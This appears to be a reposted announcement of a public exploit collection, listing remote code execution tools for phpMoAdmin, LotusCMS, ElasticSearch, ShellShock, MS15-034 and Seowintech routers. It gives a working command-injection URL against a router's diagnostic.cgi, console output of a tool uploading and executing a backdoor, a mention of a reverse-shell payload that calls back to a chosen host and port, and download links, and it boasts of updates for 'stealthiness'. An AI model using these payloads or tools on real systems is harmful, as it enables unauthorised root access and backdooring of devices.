Updates Exploits v-25.04.15 – Miscellaneous proof of concept exploit code.

Changelog and tool added 25/04/2015:
+ Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution.

Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution.

Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 25.04.2015 :
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ IISlap – http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034)
+ se0wned – Seowintech Router diagnostic.cgi remote root
+ TBA

There is no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly

::Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution::
This is an exploit for an old bug, found the exploit code lurking around in one of my old hard drives, cleaned it up, and decided to release it. Basically, a long while back, a rather interesting exploit was disclosed which affected ALL Seowontech devices. Technically, it is two exploits. A remote root command injection bug, and a remote root file disclosure bug. In this, I only bother with the command injection bug. These vulnerabilities were found by one Todor Donev.
The bug we are abusing is quite simple. Like many router bugs, it exists in a CGI script, that is used for network diagnostics. It is the bit for pinging that is vulnerable to our abuse.
PoC:

http://target.com/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;id;&ping_count=1&action=Apply&html_view=ping

Usage:
To use, simply specify the target routers base URL, and a MIPS executable to upload and execute.

Trojans~Princes$ python2 /tmp/se0wn.py 
███████╗███████╗ ██████╗ ██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔════╝██╔════╝██╔═████╗██║    ██║████╗  ██║██╔════╝██╔══██╗
███████╗█████╗  ██║██╔██║██║ █╗ ██║██╔██╗ ██║█████╗  ██║  ██║
╚════██║██╔══╝  ████╔╝██║██║███╗██║██║╚██╗██║██╔══╝  ██║  ██║
███████║███████╗╚██████╔╝╚███╔███╔╝██║ ╚████║███████╗██████╔╝
╚══════╝╚══════╝ ╚═════╝  ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═════╝ 
Exploit for Seowintech Routers, CVE-?. Version: 20150425.1
{+} Uploading our backdoor...
{*} Backdoor is in 237 chunks...
100% |#########################################################################################################################################################################################|
{+} Setting execute bit...
{+} Executing Payload...

Usage Global SCript:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable LotusCMS installation.

Download : Master.zip  | Clone Url | Our Post Before
Source : https://github.com/XiphosResearch | http://www.xiphosresearch.com/